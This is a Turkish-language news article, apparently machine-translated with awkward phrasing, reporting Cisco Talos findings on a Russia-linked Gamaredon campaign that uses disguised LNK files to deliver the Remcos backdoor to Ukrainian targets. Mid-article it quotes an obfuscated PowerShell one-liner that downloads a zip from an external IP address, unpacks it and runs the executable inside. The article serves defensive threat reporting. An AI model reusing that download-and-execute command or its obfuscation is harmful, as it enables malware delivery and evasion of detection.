Ukrayna varlıklarını hedefleyen sofistike bir siber casusluk kampanyası ortaya çıktı ve Rusya’ya bağlı Gamaredon tehdit oyuncusu grubunun en son taktiklerini ortaya koydu.
Saldırganlar, Remcos Backdoor kötü amaçlı yazılımları teslim etmek için ofis belgeleri olarak gizlenmiş silahlandırılmış LNK dosyalarını kullanıyor ve Ukrayna’daki birlik hareketleriyle ilgili temaları bir sosyal mühendislik kurbanlarını kötü amaçlı dosyaları yürütmek için kandırmak için kullanıyor.
Saldırı, kurbanların, “iletişim düğümlerinin muhtemel konumu, elektronik savaş kurulumları ve düşman İHA hesaplamaları” ve “8 gün boyunca düşman kalkışlarının koordinatları” gibi isimlerle önemli askeri belgeler olarak maskelenen LNK kısayollarını içeren ZIP arşivleri aldıklarında başlar.
Yürütüldüğünde, bu kısayollar, meşruiyet yanılsamasını korumak için bir tuzak belgesi görüntülerken enfeksiyon zincirini başlatan PowerShell kodunu sessizce çalıştırır.
Cisco Talos araştırmacıları, bu kampanyanın en azından Kasım 2024’ten beri aktif olduğunu belirledi ve Gamaredon’un özellikle Ukrayna hükümet kuruluşlarını, kritik altyapıyı ve Ukrayna’nın savunma ve güvenlik cihazına bağlı kuruluşları hedeflediğini gösteriyor.
Araştırmacılar, saldırı zinciri boyunca kullanılan gelişmiş kaçınma tekniklerini kaydetti.
PowerShell Downloader, ikinci aşama yükü almak için Rusya ve Almanya’da bulunan coğrafi çitle çevrili sunucularla iletişim kurarak algılamadan kaçınmak için gizleme yöntemlerini kullanır.
Bu seçici hedefleme, Ukrayna’da bulunan kurbanlara kötü niyetli yüklere erişimi kısıtlar ve kampanyanın radar altında kalmasına yardımcı olur.
Tehdit aktörleri, PowerShell’in güvenlik çözümleri tarafından dize tabanlı algılamayı atlamak için Get-Komut CMDLET aracılığıyla dolaylı olarak komutları yürüttüğü özellikle etkili bir teknik kullanıyor:-
if (-not(Test-Path tvdiag.''z''i''p -PathType Leaf))\{\&(g' cm) -uri ht''tp'':'/'/'146'.'1''85''.''233''.''96''/xallat/tvdiag.''zi''p -OutFile tvdiag.''zi''p\}; Expand-Archive -Path tvdiag.''zi''p -DestinationPath Drvx64; star''t Drvx64/TiVoDiag.''e''xe;DLL Sideloading Tekniği
İkinci aşama yük, meşru uygulamaların kötü amaçlı kod yüklemek için istismar edildiği sofistike bir teknik olan DLL Sideloading’i kullanır.
Bu durumda, tivodiag.exe gibi temiz uygulamalar, yürütme sırasında “mindclient.dll” gibi kötü amaçlı DLL’leri yükleyin. Kötü niyetli DLL daha sonra indirilen Zip Arşivi içindeki şifrelenmiş dosyalardan son Remcos arka kapı yükünü şifresini çözer ve yürütür.
.webp)
Bu teknik, Windows DLL arama sırasından yararlanır ve saldırganların kötü niyetli DLL’lerini meşru bir yürütülebilir dosyaya yerleştirmelerine olanak tanır.
Yürütülebilir uygulanabilir bir DLL yüklemeye çalıştığında ve yüklemeye çalıştığında, Windows’un öngörülebilir arama yolları nedeniyle kötü amaçlı sürümü yükler.
Yürütüldükten sonra, Remcos yükü kendini explorer.exe işlemine enjekte eder ve öncelikle GTHOST ve Hyperhosting altyapısında barındırılan komut ve kontrol sunucuları ile iletişim kurar.
Arka kapı, komuta ve kontrol işlemleri için 6856 bağlantı noktasını kullanır ve saldırganların casusluk amaçları için uzlaşmış sistemlere kalıcı erişimi sürdürmesini sağlar.
Bu kampanya, Gamaredon’un Ukrayna hedeflerine karşı siber casusluğa odaklanmasını gösteriyor ve grup taktiklerini özel araçlarının yanı sıra ticari kötü amaçlı yazılımları içerecek şekilde uyarlıyor.
Ukrayna ve Müttefik Milletler’deki kuruluşlar, bu kampanyayla ilişkili uzlaşma göstergeleri için önerilen güvenlik önlemlerini uygulamalı ve izlemelidir.